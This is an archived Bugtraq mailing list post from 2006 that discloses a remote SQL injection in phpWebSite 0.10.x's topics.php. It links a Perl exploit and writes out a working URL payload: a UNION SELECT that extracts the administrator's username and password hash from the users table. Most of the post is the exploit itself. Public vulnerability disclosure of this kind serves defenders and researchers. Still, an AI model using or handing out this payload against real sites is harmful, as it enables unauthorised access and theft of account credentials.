Bugtraq mailing list archives
phpWebSite 0.10.? (topics.php) Remote SQL Injection Exploit
From: selfar2002 () hotmail com
Date: 12 Apr 2006 21:40:53 -0000
--------------------------------------------------------------------------- phpWebSite <= 0.10.? (topics.php) Remote SQL Injection Exploit --------------------------------------------------------------------------- Discovered By SnIpEr_SA Author : SnIpEr_SA Exploit in Perl : http://www.milw0rm.com/exploits/1525 Remote : Yes Local : No Critical Level : Dangerous --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : phpWebSite version : 0.10.? URL : http://phpwebsite.appstate.edu/ ... ------------------------------------------------------------------ Exploit: ~~~~~~~~ # http://example.com/path/topics.php?op=viewtopic&topic=-1 Union select name,name,pass,name From users where uid=1 --------------------------------------------------------------------------- Contact: ~~~~~~~~ SnIpEr_SA E-mail: selfar2002 () hotmail com E-mail: SnIpEr_SA[at]Basdmail[dot]org Homepage: http://www.3asfh.com/ & http://www.lezr.com/ Greetz: All My Frind -------------------------------- [ EOF ] ----------------------------------
Current thread:
- phpWebSite 0.10.? (topics.php) Remote SQL Injection Exploit selfar2002 (Apr 13)
- Re: phpWebSite 0.10.? (topics.php) Remote SQL Injection Exploit Kevin Wilcox (Apr 14)